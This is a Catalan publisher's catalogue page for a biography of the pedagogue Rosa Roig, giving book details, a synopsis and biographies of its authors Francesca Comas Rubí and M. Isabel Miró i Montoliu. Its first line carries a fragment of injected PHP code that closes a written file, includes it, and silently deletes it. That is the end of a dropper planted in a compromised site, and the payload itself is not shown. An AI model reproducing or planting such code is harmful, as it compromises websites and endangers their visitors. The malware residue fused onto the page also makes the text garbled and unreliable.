");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Rosa Roig: Biografia d’una pedagoga (1890-1969) (2a edició)
Cercador d'Obres
ORDENAR:
Començar recerca

Rosa Roig: Biografia d’una pedagoga (1890-1969) (2a edició)

Comas Rubí, Francesca; Miró i Montoliu, M. Isabel

Prologuista:
Fullana, Pere
Col·lecció:
Menjavents
Tema:

Pàgines:
216
PVP:
14.00
ISBN:
84-95694-09-3
Data d'Edició:
09/09/2004
Sinopsi
Dona, mestra i escriptora, aquesta pedagoga va deixar el seu millor llegat a Mallorca. Més de vint anys dedicats a la formació de mestres a la Normal de les Balears, la van convertir en un referent pedagògic difícil de superar. El seu missatge pacifista, feminista, progressista i cívic va causar admiració i concità l’odi.
Francesca Comas Rubí
(Santa Maria del Camí, Mallorca, 1972)
És llicenciada en Pedagogia (1996), doctora en Ciències de l’Educació per la UIB (2001) i professora titular de l’Àrea de Teoria i Història de l’Educació de la UIB. Ha centrat la seva tasca investigadora en l’estudi de la història de l’educació en els segles XIX i XX, i ha publicat nombrosos estudis monogràfics i articles en revistes especialitzades. És autora, entre d’altres, de Melcior Rosselló i Simonet, mestre (1997); La consolidació del sistema educatiu liberal a Mallorca. L’aportació de Francesc Jaume Riutort i Feliu (1812-1885) (2001); Rosa Roig. Biografia d’una pedagoga (2001), en coautoria amb M.I. Miró, i Margarita Comas. Ciencia, Género y Educación (2001), en coautoria amb J.M. Bernal. Juntament amb Bernat Sureda, és codirectora del Butlletí Informatiu d’Història de l’Educació d’ençà de la seva creació l’any 2002. És vicepresidenta de la Societat d’Història de l’Educació dels Països de Llengua Catalana, i secretària de la Sociedad Española para la Conservación del Patrimonio Histórico-educativo.
M. Isabel Miró i Montoliu
(Tarragona, 1955) Doctora en Ciències de l’Educació. El 1985 es va doctorar en Ciències de l’educació a la Universitat de Barcelona, Delegació de Tarragona, amb la tesi L’educació jueva a Catalunya de l’Edat Mitjana. Actualment és professora del Departament de Pedagogia de la Universitat Rovira i Virgili (Tarragona). Les seves investigacions han girat entorn de la història de l’educació a Catalunya, i després d’una estada a la regió brasilera de l’Amazones també s’ha interessat per la història de l’educació dels pobles indígenes. És autora de L’educació jueva a Catalunya de l’Edat Mitjana (1996), Un model antropològic i la seva transferència a l’educacio actual. El cas d’algunes nacions indígenes del Brasil (1999). Adaptadora del llibre de la col·lecció “Jo vinc de” Eneide, jo vinc de Guajarà Mirim. JHa publicat articles en revistes com Bordón, Revista Española de Educación Comparada, Kesse, Butlletí d’Antics Alumnes de la Normal de la Generalitat, Univesitas Tarraconensis, Perspectivas Pedagógicas, Letre d’Amazonie, Claves de Educación Social, Linda. Forma part, de de 1996, del consell de redacció de la revista Educació i Història. És membre, entre d’altres, de la Societat d’Història de l’Educació dels Països de Llengua Catalana, de la Sociedad Española de Historia de la Educación, del Seminari de Formació del Professorat d’Història de l’Educació dels Països Catalans i de l’Associació d’Antics Alumnes de la Normal de la Generalitat.
Recomanar
Comentar
Comentaris (0)